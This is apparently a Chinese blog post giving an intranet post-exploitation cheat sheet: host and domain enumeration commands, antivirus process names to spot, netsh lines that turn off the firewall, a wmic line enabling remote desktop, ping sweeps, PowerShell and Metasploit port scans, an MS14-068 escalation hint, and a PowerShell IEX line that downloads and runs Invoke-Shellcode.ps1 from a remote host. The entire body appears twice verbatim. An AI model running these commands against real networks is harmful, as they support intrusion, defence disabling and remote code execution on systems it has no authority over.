admin管理员组

文章数量:1026989

【内网】

1、本机收集

1.1 系统及软件信息wmic product get name,version查看安装的软件和版本信息1.2 服务信息wmic service list brief 查询本机的服务信息1.3 进程信息tasklist 查看当前进程列表和进程用户wmic process list brief 查看进程信息1.4 杀软识别360sd.exe  360tray.exe  ZhuDongFangYu.exe  SafeDogUpdateCenter.exe  Mcfee McShield.exe	AVP.EXE(卡巴斯基)		avguard.exe(小红伞)	 bdagent.exe(bitDefender)1.5 启动程序信息wmic startup get command,caption1.6 计时任务schtasks /query /fo LIST /v1.7 用户列表net user 查看本机用户列表net localgroup administrators 获取本地管理员(通常包含域用户)信息query user || qwinsta  查询当前在线用户1.8 端口信息netstat -ano 可以查看TCP UDP等端口的使用情况1.9 补丁信息systeminfo 查看系统信息wmic qfe get Caption,Description,HotFixID,InstalledOn 查看补丁信息1.10 本机共享列表net share 查询路由表route print  arp -a1.11 防火墙信息netsh firewall set opmode disablenetsh advfirewall set allprofiles state off (win2003后的系统)  关闭防火墙1.12 代理配置reg query "HKEY_CURRENT)USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"1.13 开启远程连接端口wmic /namespace:\\root\cimv2\terminalservices pathwin32_terminalservicesetting where (__class !="") call setallowtsconnections 1

如下:bat脚本代码

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> xxx.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> xxx.html
wmic USERACCOUNT list full /format:"%var%" >> xxx.html
wmic group list full /format:"%var%" >> xxx.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> xxx.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> xxx.html
wmic netuse list full /format:"%var%" >> xxx.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> xxx.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> xxx.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> xxx.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> xxx.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> xxx.html```

复制为.bat文件,跑完后查看xxx.html

2、查看权限

2.1whoami---查看权限
2.2whoami /all---查看域SID
2.3net user administrator /domain---administrator详细信息

3、是否存在域环境

3.1ipconfig /all判断是否存在域网段划分,dns服务器ip等信息3.2systeminfo查看当前所在的域和域控服务器的计算机名可以通过ping 域控服务器的主机名来获取域控ip查看补丁情况3.3net group "domain admins" /domain通过此命令查询到当前域管理员为"Administrator"3.4net user /domain通过此命令获取当前域内存在的用户名3.5net group "domain computers" /domain通过此选项查看当前加入域内的主机名3.6net time /domain查看域时间及域服务器名

4、主机探活

4.1ICMP协议for /L %I in (1,1,254) DO @ping -w 1 -n 192.168.1.%I | findstr "TTL="
4.2利用nbtscan、arp-scan

5、端口探测

5.1 telnet
5.2 msf扫描auxiliary/scanner/portscan/ack        ACK防火墙扫描auxiliary/scanner/portscan/ftpbounce  FTP跳端口扫描auxiliary/scanner/portscan/syn        SYN端口扫描auxiliary/scanner/portscan/tcp        TCP端口扫描auxiliary/scanner/portscan/xmas       TCP"XMas"端口扫描使用auxiliary/scanner/portscan/tcp模块
5.3 nishang.ps1-StartAddress 扫描范围开始地址 -EndAddress 扫描范围结束地址-ScanPort 进行端口扫描-Port 指定端口                                                                                                                           -TimeOut 设置超时时间-ResolveHost 解析主机名扫描存活主机及端口并解析主机名
5,4 nmap

6、域信息

6.1net group "domain computers" /domain探测域内主机
6.2ping存在的主机名,获取域账号的IP地址
6.3批量存活,端口探测。for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

7、找域控

7.1nltest /DCLIST:域名查找域列表
7.2net group"Domain Controllers" /domain查找域控制器
7.3netdom query pdc查找主域控制器

8、获取域用户和域管理信息

8.1 查看域内所有用户net user /domainwmic useraccount get /alldsquery usernet localgroup administrators /domain
8.2 查询域管理员用户组net group"domain admins" /domainnet group"Enterprise Admains" /domain​

9、查找域管进程

		本机检查查找域控制器的域用户会话扫描远程系统上运行的任务查看补丁信息:wmic qfe     *ms14-068,可以用来进行提权,kb3011780查看操作系统类型:wmic os

10、psl脚本收集信息

10.1远程下载IEX (New-Object Net.WebClient).DownloadString("http://IP Adress/CodeExecution/Invoke--Shellcode.ps1")
10.2更改执行策略Set-ExecutionPolicy RemoteSigned
10.3端口扫描
10.3.1单个IP扫描1..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("127.0.0.1",$_)) "Port $_ is open!"} 2>$null10.3.2IP段中单端口扫描(4.0版本中引用)foreach ($ip in 1..254) {Test-NetConnection -Port 445 -InformationLevel "Detailed" 192.168.1.$ip}10.3.3IP段多端口扫描,1..254 | % { $a = $_; 1..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open!"} 2>$null}针对某IP段 & 多个端口的扫描器v2,对指定端口进行扫描1..254 | % { $a = $_; write-host "------"; write-host "192.168.1.$a"; 22,53,80,445 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open!"} 2>$null}

补充:bloodhound安装

		kali:执行如下命令apt-get updateapt-get dist-upgradeapt-get install bloodhound终端输入neo4j  console启动,访问地址:http://localhost:7474默认账密neo4j:neo4j再开新终端输入bloodhound

【内网】

1、本机收集

1.1 系统及软件信息wmic product get name,version查看安装的软件和版本信息1.2 服务信息wmic service list brief 查询本机的服务信息1.3 进程信息tasklist 查看当前进程列表和进程用户wmic process list brief 查看进程信息1.4 杀软识别360sd.exe  360tray.exe  ZhuDongFangYu.exe  SafeDogUpdateCenter.exe  Mcfee McShield.exe	AVP.EXE(卡巴斯基)		avguard.exe(小红伞)	 bdagent.exe(bitDefender)1.5 启动程序信息wmic startup get command,caption1.6 计时任务schtasks /query /fo LIST /v1.7 用户列表net user 查看本机用户列表net localgroup administrators 获取本地管理员(通常包含域用户)信息query user || qwinsta  查询当前在线用户1.8 端口信息netstat -ano 可以查看TCP UDP等端口的使用情况1.9 补丁信息systeminfo 查看系统信息wmic qfe get Caption,Description,HotFixID,InstalledOn 查看补丁信息1.10 本机共享列表net share 查询路由表route print  arp -a1.11 防火墙信息netsh firewall set opmode disablenetsh advfirewall set allprofiles state off (win2003后的系统)  关闭防火墙1.12 代理配置reg query "HKEY_CURRENT)USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"1.13 开启远程连接端口wmic /namespace:\\root\cimv2\terminalservices pathwin32_terminalservicesetting where (__class !="") call setallowtsconnections 1

如下:bat脚本代码

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> xxx.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> xxx.html
wmic USERACCOUNT list full /format:"%var%" >> xxx.html
wmic group list full /format:"%var%" >> xxx.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> xxx.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> xxx.html
wmic netuse list full /format:"%var%" >> xxx.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> xxx.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> xxx.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> xxx.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> xxx.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> xxx.html```

复制为.bat文件,跑完后查看xxx.html

2、查看权限

2.1whoami---查看权限
2.2whoami /all---查看域SID
2.3net user administrator /domain---administrator详细信息

3、是否存在域环境

3.1ipconfig /all判断是否存在域网段划分,dns服务器ip等信息3.2systeminfo查看当前所在的域和域控服务器的计算机名可以通过ping 域控服务器的主机名来获取域控ip查看补丁情况3.3net group "domain admins" /domain通过此命令查询到当前域管理员为"Administrator"3.4net user /domain通过此命令获取当前域内存在的用户名3.5net group "domain computers" /domain通过此选项查看当前加入域内的主机名3.6net time /domain查看域时间及域服务器名

4、主机探活

4.1ICMP协议for /L %I in (1,1,254) DO @ping -w 1 -n 192.168.1.%I | findstr "TTL="
4.2利用nbtscan、arp-scan

5、端口探测

5.1 telnet
5.2 msf扫描auxiliary/scanner/portscan/ack        ACK防火墙扫描auxiliary/scanner/portscan/ftpbounce  FTP跳端口扫描auxiliary/scanner/portscan/syn        SYN端口扫描auxiliary/scanner/portscan/tcp        TCP端口扫描auxiliary/scanner/portscan/xmas       TCP"XMas"端口扫描使用auxiliary/scanner/portscan/tcp模块
5.3 nishang.ps1-StartAddress 扫描范围开始地址 -EndAddress 扫描范围结束地址-ScanPort 进行端口扫描-Port 指定端口                                                                                                                           -TimeOut 设置超时时间-ResolveHost 解析主机名扫描存活主机及端口并解析主机名
5,4 nmap

6、域信息

6.1net group "domain computers" /domain探测域内主机
6.2ping存在的主机名,获取域账号的IP地址
6.3批量存活,端口探测。for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

7、找域控

7.1nltest /DCLIST:域名查找域列表
7.2net group"Domain Controllers" /domain查找域控制器
7.3netdom query pdc查找主域控制器

8、获取域用户和域管理信息

8.1 查看域内所有用户net user /domainwmic useraccount get /alldsquery usernet localgroup administrators /domain
8.2 查询域管理员用户组net group"domain admins" /domainnet group"Enterprise Admains" /domain​

9、查找域管进程

		本机检查查找域控制器的域用户会话扫描远程系统上运行的任务查看补丁信息:wmic qfe     *ms14-068,可以用来进行提权,kb3011780查看操作系统类型:wmic os

10、psl脚本收集信息

10.1远程下载IEX (New-Object Net.WebClient).DownloadString("http://IP Adress/CodeExecution/Invoke--Shellcode.ps1")
10.2更改执行策略Set-ExecutionPolicy RemoteSigned
10.3端口扫描
10.3.1单个IP扫描1..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("127.0.0.1",$_)) "Port $_ is open!"} 2>$null10.3.2IP段中单端口扫描(4.0版本中引用)foreach ($ip in 1..254) {Test-NetConnection -Port 445 -InformationLevel "Detailed" 192.168.1.$ip}10.3.3IP段多端口扫描,1..254 | % { $a = $_; 1..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open!"} 2>$null}针对某IP段 & 多个端口的扫描器v2,对指定端口进行扫描1..254 | % { $a = $_; write-host "------"; write-host "192.168.1.$a"; 22,53,80,445 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open!"} 2>$null}

补充:bloodhound安装

		kali:执行如下命令apt-get updateapt-get dist-upgradeapt-get install bloodhound终端输入neo4j  console启动,访问地址:http://localhost:7474默认账密neo4j:neo4j再开新终端输入bloodhound

本文标签: 内网

版权声明:本文标题:【内网】 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://it.en369.cn/jiaocheng/1706236838a407723.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。